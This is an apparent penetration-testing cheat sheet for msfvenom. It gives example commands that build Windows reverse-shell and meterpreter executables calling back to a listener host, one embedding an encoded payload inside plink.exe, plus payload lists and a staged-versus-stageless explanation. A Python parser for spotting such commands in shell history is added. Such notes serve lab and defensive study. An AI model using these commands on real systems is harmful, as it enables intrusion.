# Msfvenom

![](https://2774131807-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M64VB6Sr653y4KPdauj%2F-M6G5gqO4VvhohFFsFeV%2F-M6G6PsGaChKqfm0jQCk%2FMSFvenom1.jpg?alt=media\&token=48fcb5c1-7b8d-4753-a708-cafb996f2e4a)

### Command Options

```
-p, --payload: Payload to use. Specify a '-' or stdin to use custom payloads
-b, --bad-chars: The list of characters to avoid
-f, --format: Output format
-a, --arch: The architecture to use
--platform: The platform of the payload
-v, --var-name: Specify a custom variable name to use for certain output formats
-e, --encoder: The encoder to use
```

{% embed url="<https://www.offensive-security.com/metasploit-unleashed/msfvenom/>" %}

### Examples of Usage

```
msfvenom -l payloads | grep x86
# List payloads

msfvenom -p windows/shell_reverse_tcp --list-options
# Display payload options

msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.11.0.75 LPORT=4444 -f asp -o tcp_shell.asp

msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.11.0.75 LPORT=1234 -f exe -o tcp_shell.exe

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.5 LPORT=4444 -f exe -o shell_reverse.exe

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.5 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
# Injection into a PE file

msfvenom -p windows/meterpreter/reverse_https LHOST=10.11.0.5 LPORT=443 -f exe -o met_https_reverse.exe
```

### List of commonly used payloads

```
<Staged>
windows/shell/reverse_tcp  
windows/x64/shell/reverse_tcp
windows/meterpreter/reverse_tcp 
windows/x64/meterpreter/reverse_tcp

<Stageless>
windows/shell_reverse_tcp
windows/x64/shell_reverse_tcp
windows/meterpreter_reverse_tcp 
windows/x64/meterpreter_reverse_tcp
```

### Staged vs Stageless payloads

> Staged payloads are denoted with the use of a forward slash (**/**; e.g. **windows/shell/reverse\_tcp**). Staged payloads send a small stager to the target, which connects back to the attacker and downloads the rest of the payload. Therefore, staged payloads need special payload listeners, such as **multi/handler** in Metasploit. Staged payloads are ideal in situations where you have limited shellcode space, most commonly in Buffer Overflows (but that’s a story for another day)
>
> Stageless payloads are denoted with the use of an underscore (**\_**; e.g. **windows/shell\_reverse\_tcp**). Stageless payloads send the entire payload to the target at once, and therefore don’t require the attacker to provide more data. That means we have a variety of listeners we can use, such as Netcat. Find out how to set up a listener using Netcat/Ncat in my post [here](https://medium.com/@PenTest_duck/offensive-netcat-ncat-from-port-scanning-to-bind-shell-ip-whitelisting-834689b103da?source=friends_link\&sk=774174bfcb283864cf4468d2db460d0e).
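
An added example (not from the original page or the quoted post) for the defender's side of the staged/stageless distinction: a Python helper that parses msfvenom invocations recovered from shell history or command-line telemetry, pulls out the payload, the LHOST:LPORT listener to hunt for, any template binary (`-x`) and encoder, and classifies each payload by the slash/underscore convention quoted above. The sample lines are constructed from the commands on this page; the option table covers only the flags used here plus their long forms.

```python
import shlex

# Constructed shell-history / command-line telemetry sample built from this page's commands.
SAMPLE_LINES = [
    "msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.11.0.75 LPORT=4444 -f asp -o tcp_shell.asp",
    "msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.5 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe",
    "msfvenom -p windows/meterpreter/reverse_https LHOST=10.11.0.5 LPORT=443 -f exe -o met_https_reverse.exe",
    "ls -la /tmp",
]

# msfvenom options that take a value, so the value is not misread as another flag.
OPTS_WITH_ARG = {"-p", "--payload", "-f", "--format", "-a", "--arch", "--platform", "-e", "--encoder",
                 "-i", "--iterations", "-x", "--template", "-o", "--out", "-b", "--bad-chars", "-v", "--var-name"}

def is_staged(payload: str) -> bool:
    """Convention quoted above: after platform (and optional x86/x64), '/' = staged, '_' = stageless."""
    rest = payload.split("/")[1:]
    if rest and rest[0] in ("x86", "x64"):
        rest = rest[1:]
    return len(rest) > 1

def parse_invocation(line: str):
    """Return a triage record for one msfvenom command line, or None if it is not one."""
    try:
        argv = shlex.split(line)
    except ValueError:  # unbalanced quotes: not parseable, skip
        return None
    if not argv or argv[0].rsplit("/", 1)[-1] != "msfvenom":
        return None
    kv, flags, i = {}, {}, 1
    while i < len(argv):
        tok = argv[i]
        if tok in OPTS_WITH_ARG and i + 1 < len(argv):
            flags[tok], i = argv[i + 1], i + 2
            continue
        if "=" in tok and not tok.startswith("-"):  # payload options: LHOST=..., LPORT=...
            key, val = tok.split("=", 1)
            kv[key.upper()] = val
        else:                                       # boolean switch, e.g. --list-options
            flags[tok] = True
        i += 1
    payload = flags.get("-p") or flags.get("--payload")
    if payload is None:
        return None
    return {"payload": payload, "staged": is_staged(payload),
            "listener": f"{kv.get('LHOST', '?')}:{kv.get('LPORT', '?')}",
            "output": flags.get("-o") or flags.get("--out"),
            "template": flags.get("-x") or flags.get("--template"),
            "encoder": flags.get("-e") or flags.get("--encoder")}
```

A staged result tells the responder to expect a second-stage download after the initial connection, while a template path points at a legitimate-looking binary on the host that should be compared against its known-good copy.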

{% embed url="<https://medium.com/@PenTest_duck/offensive-msfvenom-from-generating-shellcode-to-creating-trojans-4be10179bb86>" %}

### Link

{% embed url="<https://www.hackingarticles.in/msfvenom-tutorials-beginners/>" %}

{% embed url="<https://www.hackingarticles.in/generating-reverse-shell-using-msfvenom-one-liner-payload/>" %}

{% embed url="<https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom>" %}

{% embed url="<https://netsec.ws/?p=331>" %}

